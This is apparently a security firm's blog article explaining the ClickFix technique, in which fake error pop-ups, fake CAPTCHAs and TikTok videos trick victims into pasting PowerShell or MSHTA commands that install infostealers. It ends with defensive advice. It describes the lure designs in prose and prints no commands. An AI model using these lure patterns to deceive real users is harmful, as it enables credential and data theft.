ClickFix technique: How to get the victim to infect their computer

Malicious actors use the ClickFix technique to trick their victims into downloading and installing malware on their devices

When we say that malicious actors never stop innovating, we don’t just make a statement for the sake of making one. Without further elaboration, in the field of social engineering, new techniques or variations of existing methods are constantly emerging with the aim of deceiving citizens and companies.

Thus, over the last year, the ClickFix technique has gained relevance, a key feature of which is that it enables criminals to persuade victims to execute malicious code on their computers. Obviously, they do so without realizing that they are carrying out this action.

What does the ClickFix technique consist of? What are its potential consequences for citizens and companies? How can companies protect themselves against it? We answer these questions below.

1. Social engineering and malware, a critical combination for malicious activity

Like many other malicious techniques, the ClickFix technique combines two key elements: social engineering and malware to deceive victims, infect their computers, and access credentials, cookies, data, and documents stored on them.

First, malicious actors impersonate a company that is recognizable to the victim and does not arouse their suspicion. For example, leading companies in business software, such as Microsoft or Google, or even companies linked to the sector in which the companies they wish to attack operate.

They generally send an email to their victims redirecting them to malicious URLs with a plausible excuse, such as installing a software security update.

However, a problem on these pages prevents them from being accessed correctly. To solve this, victims must copy and run a script on their computers. However, what they are actually doing is executing PowerShell or MSHTA commands that download and run a remote script, which will install an infostealer on the victim’s device.

In this way, the criminals circumvent the security mechanisms of web browsers that block the download of malicious programs, and also catch users off guard who are more reluctant to download and run software on their computers, especially if they are company-owned.

Similarly, we should note that tools such as PowerShell do not typically generate alerts, as it is the user who executes the command, making automatic detection difficult.

Thanks to this malware, which often goes unnoticed by the victim, malicious actors can steal critical information stored on the device, including corporate software access credentials, cookies, various documents, financial data, and cryptocurrency wallets.

2. How do they get victims to copy and execute commands on their computers?

What is the key element of the ClickFix technique? Getting the victim to decide to copy and execute the malicious code on their computer. Hence, much of the success of this technique lies in the ability of hostile actors to deceive users. What tricks do they use?

2.1. Solving a problem by executing commands on the device

Most commonly, hostile actors using the ClickFix technique attempt to deceive their victims by presenting them with a false problem that can be resolved by executing malicious commands.

For example, consider a professional who has clicked on a supposed Google Meet link. They land on a fake page that is so well designed that it looks real. However, a pop-up alert appears, warning them that the page cannot be displayed correctly until the problem is resolved.

This alert typically includes a button labeled “Fix It,” which is why this technique is known as ClickFix. When clicked, the malicious command is copied, and another pop-up window opens, instructing the user to open the Windows console, copy the command, and execute it.

Is the ClickFix technique only being used against computers running Windows? No. Attacks against computers running Linux and macOS, as well as iOS and Android devices, have also been detected.

Furthermore, it is essential to note that malicious pages are not the only means used to implement the ClickFix technique. For example, the malicious group TA571 has resorted to a supposed Word document that cannot be displayed because it would require installing a Word Online extension in the browser.

This case illustrates the ingenuity of malicious actors and their ongoing pursuit of new techniques, tactics, and procedures.

2.2. A fake user verification process

How many times have you tried to enter a website and encountered a CAPTCHA process to verify that you are a person and not a bot? Well, malicious actors are also using fake CAPTCHA pages to deceive their victims.

When the user clicks on the button to verify that they are a person, the commands are copied, and a pop-up similar to the one in the previous case opens, indicating the path the user must follow, but disguising it as supposed steps to verify their identity.

2.3. The ClickFix technique has reached TikTok

Well, these classic strategies are now being joined by a deception tactic that uses none other than TikTok, the social network of the moment.

Through videos posted on the TikTok platform and created using generative AI, methods are promoted to install paid versions of software such as Microsoft Office or CapCut, as well as the premium version of Spotify, for free on computers. The reach of these campaigns is concerning because these videos often employ an “easy trick” hook that attracts a large audience.

What do these supposed tricks consist of? Indeed, they involve copying and executing malicious commands. As a result, victims will not enjoy the promised software but will instead suffer the installation of an infostealer that will steal their passwords, cookies, and other valuable information.

Unlike previous variants of the ClickFix technique, which use phishing and target professionals at specific companies, this variant seeks to cast a wide net and infect as many devices as possible.

3. What are hostile actors looking for when using the ClickFix technique?

The mantra “information is power” has been valid since the dawn of civilization, but in the world of cybersecurity, it is even more true.

That is why numerous groups specializing in malware development have opted to use the ClickFix technique to break into corporate computers, getting the victims themselves to infect them with infostealers that scan web browsers, authentication process management applications, or cryptocurrency wallets. What are they looking for? Credentials, passwords, session cookies, multi-factor authentication tokens, and other sensitive data.

What is the purpose of obtaining this wealth of information?

• Extort companies by threatening to disclose confidential data and documents about them or their customers.
• Commit financial fraud against companies, their customers, or their professionals.
• Impersonate the company and its professionals in fraud against third parties.
• Sell data on the dark web that allows other cybercriminals to carry out attacks against companies, their employees, their customers, or their suppliers.
• Spy on specific companies and trade the information obtained.

In other words, the primary objective, as is often the case in the field of cyberattacks and fraud, is to generate revenue from malicious actions.

Which infostealers can the malicious actors behind the ClickFix technique use? The list of detected malware is long: AsyncRAT, Atomic Stealer, Danabot, DarkGate, Lumma Stealer, NetSupport, Odyssey Stealer, Stealc, Vidar… This clearly demonstrates the commitment of multiple criminal groups to the ClickFix technique.

4. How can companies combat the ClickFix technique?

The ClickFix technique can put ordinary people at risk, but above all, it poses a major threat to businesses. Why? If cybercriminals manage to infect a corporate computer, they can gain access to critical information and programs, causing significant financial losses for organizations.

To deal with increasingly sophisticated and difficult-to-detect techniques and tactics, it is essential that companies:

• Restrict the use of tools that allow commands to be executed or limit privileges on computers.
• Commit to ongoing training and raising awareness among their professionals.

4.1. Social engineering tests are key

In this regard, they can periodically undergo social engineering tests. Through these tests, cybersecurity experts carry out customized attack simulations to:

1. Assess an organization’s level of maturity in the face of sophisticated social engineering techniques such as ClickFix.
2. Define the level of risk to which the company is exposed to social engineering attacks and propose measures to reduce this level and increase the ability to resist malicious techniques and tactics.
3. Raise awareness among professionals and managers about the consequences of a social engineering attack against their organization.
4. Provide practical training to company staff so they can implement a series of best practices in their day-to-day work, which will help them avoid falling victim to social engineering attacks, such as the ClickFix technique, CEO fraud, malvertising, or SEO poisoning.

In addition, companies must carry out continuous security audits to detect the presence of malicious programs on corporate computers and be prepared to activate the incident response in the shortest possible time to contain the impact and expel hostile actors.

In short, the rise of the ClickFix technique demonstrates once again that malicious actors are highly motivated and relentless in their efforts to design attacks that enable them to overcome the mistrust of citizens and professionals, ultimately infecting their devices.

Given that attempts at fraud against companies and individuals continue to grow, companies must increase their resilience to social engineering and implement cybersecurity services that enable them to do so.